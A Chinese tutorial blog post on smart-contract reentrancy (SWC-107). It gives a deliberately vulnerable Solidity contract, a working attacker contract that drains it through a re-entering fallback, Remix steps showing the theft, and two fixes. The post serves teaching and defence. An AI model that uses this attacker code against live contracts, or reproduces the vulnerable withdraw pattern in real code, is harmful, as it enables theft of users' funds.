当前位置:网站首页>智能合约安全-可重入攻击(SW107-Reentrancy)
智能合约安全-可重入攻击(SW107-Reentrancy)
2022-08-02 23:33:00 【Johnathan】
攻击名称
可重入攻击(Reentrancy)
攻击分类CWE-841
代码实现与预期行为不一致
攻击描述
主要的风险就是调用外部合约会接管合约的控制流。在可重入攻击中,恶意合约在被攻击合约的第一个函数执行完成前在再次调用合约,这可能导致函数调用与预期行为不一致。核心流程与原理如下:
合约案例
被攻击合约
// SPDX-License-Identifier: GPL-3.0pragma solidity ^0.6.10;contract Victim { mapping(address=> uint256) public balances; function deposit() public payable{ balances[msg.sender] += msg.value; } function withdraw(uint256 amount) public { require(balances[msg.sender] >= amount); (bool success,) = msg.sender.call{value:amount}(""); require(success, "Fail to send ether!"); balances[msg.sender] -= amount; } function getBalance() public view returns(uint){ return address(this).balance; }}攻击合约
contract Attacker{ Victim public victim; constructor(address _victimAddr) public { victim = Victim(_victimAddr); } function beginAttack() external payable{ require(msg.value >= 1 ether); victim.deposit{value: 1 ether}(); victim.withdraw(1 ether); } fallback() external payable{ //死循环的话一毛也取不到 if (address(victim).balance >= 1 ether) { victim.withdraw(1 ether); } } function getBalance() public view returns(uint){ return address(this).balance; }}操作示例
- 采用Remix账户1部署Victim合约,然后调用deposit存入4个ETH
- 采用Remix账户1部署Attacker合约,然后调用beginAttack并传入1个ETH
- Victim合约GetBalance: 0, Attacker合约GetBalance 5
防止策略
- 切换存储更新和外部调用的顺序,防止启用攻击的重新进入条件。遵循“检查-效果-相互作用”设计模式。
contract Victim{ ... function withdraw(uint256 amount) public { require(balances[msg.sender] >= amount); balances[msg.sender] -= amount; (bool success,) = msg.sender.call{value:amount}(""); require(success, "Fail to send ether!"); }2.加锁。
bool internal locked; modifier noReentrant(){ require(!locked, "No re-entrancy!"); locked = true; _; locked = false; } function withdraw(uint256 amount) public noReentrant{ require(balances[msg.sender] >= amount); (bool success,) = msg.sender.call{value:amount}(""); require(success, "Fail to send ether!"); balances[msg.sender] -= amount; }边栏推荐
猜你喜欢
WAF WebShell Trojan free to kill
Cholesterol-PEG-Amine,CLS-PEG-NH2,胆固醇-聚乙二醇-氨基脂两亲性脂质衍生物
2022第十一届财经峰会:优炫软件斩获双项大奖
Teach you to locate online MySQL slow query problem hand by hand, package teaching package meeting
The latest real software test interview questions are shared. Are you afraid that you will not be able to enter the big factory after collecting them?
IDEA多线程调试
新公链时代的跨链安全性解决方案
【系统架构设计师】第三章 数据库系统
Pytest配置项-pytest.ini
优秀论文以及思路分析02
随机推荐
js基础知识整理之 —— Math
2022 China Eye Expo, Shandong Eye Health Exhibition, Vision Correction Instrument Exhibition, Eye Care Products Exhibition
主流定时任务解决方案全横评
2022暑假牛客多校1 (A/G/D/I)
Heartwarming AI Review (1)
如何使用vlookup+excel数组公式 完成逆向查找?
用了TCP协议,就一定不会丢包吗?
Nlog自定义时间
停止使用 Storyboards 和 Interface Builder
最近公共祖先(LCA)学习笔记 | P3379 【模板】最近公共祖先(LCA)题解
Technology Sharing | How to do assertion verification for xml format in interface automation testing?
心电记录电路设计(框图/波形以及信号放大器的选择)
Test | ali internship 90 days in life: from the perspective of interns, talk about personal growth
js基础知识整理之 —— 全局作用域
Cholesterol-PEG-Amine,CLS-PEG-NH2,胆固醇-聚乙二醇-氨基脂两亲性脂质衍生物
6、Powershell命令配置Citrix PVS云桌面桌面注销不关机
Directing a non-relational database introduction and deployment
CAS:1445723-73-8,DSPE-PEG-NHS,磷脂-聚乙二醇-活性酯两亲性脂质PEG共轭物
可编程逻辑控制器(PLC) : 基础、类型和应用
如何突破测试/开发程序员思维?一种不一样的感觉......